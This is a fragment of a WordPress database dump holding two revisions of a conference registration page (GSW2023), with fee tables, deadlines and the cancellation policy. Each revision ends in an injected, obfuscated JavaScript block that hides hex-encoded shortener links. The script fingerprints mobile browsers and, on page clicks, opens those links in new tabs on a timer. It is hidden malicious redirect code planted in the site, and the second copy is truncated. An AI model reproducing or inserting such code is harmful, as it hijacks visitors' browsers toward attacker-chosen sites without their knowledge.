Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong><span style=\"font-size: 14pt;\">Standard and student / senior (over 65) registration fees include:</span></strong></h5>\n<ul class=\"nospace\">\n<li><span style=\"font-size: 12pt;\"><strong>Entry to all sessions/workshops;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to the Exhibition;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Copy of Final Programme;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Lunches;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong> Accompanying person fee includes:</strong></span></h5>\n<ul>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to Opening Session;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">Cancellation policy:</h5>\n<ul>\n<li><strong><span style=\"font-size: 12pt;\">Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</span></strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"><strong>-Two Social Dinners Will Be Organized On Tuesday And Thursday.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:11:23','2023-02-05 08:11:23','',2638,'https://gsw2023.com/?p=3775',0,'revision','',0),
(3776,1,'2023-02-05 08:19:33','2023-02-05 08:19:33','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 12pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: \'Andale Mono\', Times;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<strong><span style=\"font-size: 14pt; color: black; font-family: \'Andale Mono\', Times;\">Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</span></strong></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>Early bird registration deadline: May 1, 2023</li>\n<li>Late registration deadline: July 1, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><strong>Accompanying person fee includes:</strong></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><strong>Cancellation policy:</strong></li>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n<li><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 